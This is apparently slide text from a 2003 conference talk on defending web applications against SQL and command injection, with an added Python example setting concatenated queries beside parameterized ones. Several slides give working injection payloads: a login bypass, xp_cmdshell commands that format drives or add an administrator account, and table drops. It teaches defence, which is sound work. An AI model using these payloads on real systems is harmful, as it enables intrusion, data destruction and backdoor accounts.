Defending Applications Against Command Insertion Attacks
Penn State Web Conference 2003
Arthur C. Jones
June 18, 2003
The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteers from across the world. The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com. All software and documentation is released under the GNU public licenses.
The OWASP Top-10:
1. Unvalidated Parameters
2. Broken Access Control
3. Broken Account and Session Management
4. Cross-Site Scripting (XSS) Flaws
5. Buffer Overflows
6. Command Injection Flaws
7. Error Handling Problems
8. Insecure Use of Cryptography
9. Remote Administration Flaws
10. Web and Application Server Misconfiguration
The front door: Any time the user can supply free-form text that will be incorporated directly into a SQL statement. [Login form with Username and Password fields]
How the lock works: ASP/PHP/CGI is used to compose a SQL query:
    SELECT * FROM tbl_Users WHERE UID='testuser' AND PWD='testpass'
How the lock fails:
    SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1;--'
Going through the broken lock… Is Account_No really a number?
Going through the broken lock… (continued):
    '; INSERT INTO tbl_Users VALUES 'newuser', 'password', 'lastname', 'firstname', 'account';--
    '; UPDATE tbl_Users SET L_Name=(SELECT TOP 1 UID FROM tbl_Users WHERE ORDER BY UID) WHERE UID='newuser';--
Fun things you can do with a broken lock:
    SELECT * FROM tbl_Users WHERE UID=''; exec master..xp_cmdshell 'dir c:\ > c:\inetpub\wwwroot\directory.txt';--' AND PWD=''
You should then be able to browse to the file you have just created.
Fun things you can do with a broken lock (continued):
    SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1; exec me.';--'
Causing damage:
    '; shutdown with nowait;--
Get the name of the table by using a "having" clause (' having 1=1;--), then:
    '; drop table tablename;--
Causing damage (continued): how about this:
    '; exec master..xp_cmdshell 'format c: /q /yes';--
or this:
    '; exec master..xp_cmdshell 'net user newacct password /add'; exec master..xp_cmdshell 'net localgroup administrators newacct /add';--
What can we do about it:
- Be aware of the contexts the program will run in. Accounts should have specific permissions; only the permissions they need.
- Scrub all user input: only accept allowed string lengths, escape quotes, look for suspicious text (--, xp_, drop, etc.).
- Don't depend on client-side checks.
What can we do about it (continued):
- Redirect the default error messages.
- Move ASP-built SQL queries into stored procedures.
- Check referral URLs.
- Don't give away information for free.
- Keep application logs.
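An added example, not from the slides: the front-door login query built the way the "How the lock works" slide shows it (string concatenation) beside the parameterized form, plus a positive check for the Account_No field. Python's standard-library sqlite3 stands in for SQL Server (an assumption), and the tbl_Users table and its two rows are constructed here; the column names beyond UID, PWD and L_Name are assumed.

```python
import sqlite3

# Constructed in-memory stand-in for the slides' tbl_Users (assumed columns; the
# slides only name UID, PWD and L_Name). PWD is stored in clear to mirror the
# slides' queries; a real system would store a password hash instead.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tbl_Users (UID TEXT, PWD TEXT, L_Name TEXT, "
                "F_Name TEXT, Account_No INTEGER)")
    con.executemany("INSERT INTO tbl_Users VALUES (?, ?, ?, ?, ?)", [
        ("jsmith", "s3cret", "Smith", "John", 1001),
        ("testuser", "testpass", "Test", "User", 1002),
    ])
    return con

def login_vulnerable(con, uid, pwd):
    """The slides' 'lock': user text is pasted straight into the SQL string."""
    sql = f"SELECT UID FROM tbl_Users WHERE UID='{uid}' AND PWD='{pwd}'"
    # With pwd = "' or 1=1;--" the string becomes
    #   SELECT UID FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1;--'
    # and the OR 1=1 matches every row, as on the 'How the lock fails' slide.
    return [row[0] for row in con.execute(sql)]

def login_parameterized(con, uid, pwd):
    """The fix: bind parameters. The driver sends the values separately from
    the SQL text, so quotes, semicolons and '--' in the input are compared
    against the column as plain characters and are never parsed as SQL."""
    sql = "SELECT UID FROM tbl_Users WHERE UID=? AND PWD=?"
    return [row[0] for row in con.execute(sql, (uid, pwd))]

def parse_account_no(text):
    """'Is Account_No really a number?' Positive validation: accept only a
    short run of digits and convert to int before it gets near a query."""
    if not (1 <= len(text) <= 10 and text.isdigit()):
        raise ValueError("Account_No must be 1 to 10 digits")
    return int(text)

if __name__ == "__main__":
    payload = "' or 1=1;--"  # the slides' password-field payload
    print("concatenated:  ", login_vulnerable(make_db(), "jsmith", payload))
    print("parameterized: ", login_parameterized(make_db(), "jsmith", payload))
```

The concatenated query returns every user for the slides' payload; the parameterized one returns nothing, because no row has that literal text as its password.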
Thank You! Questions?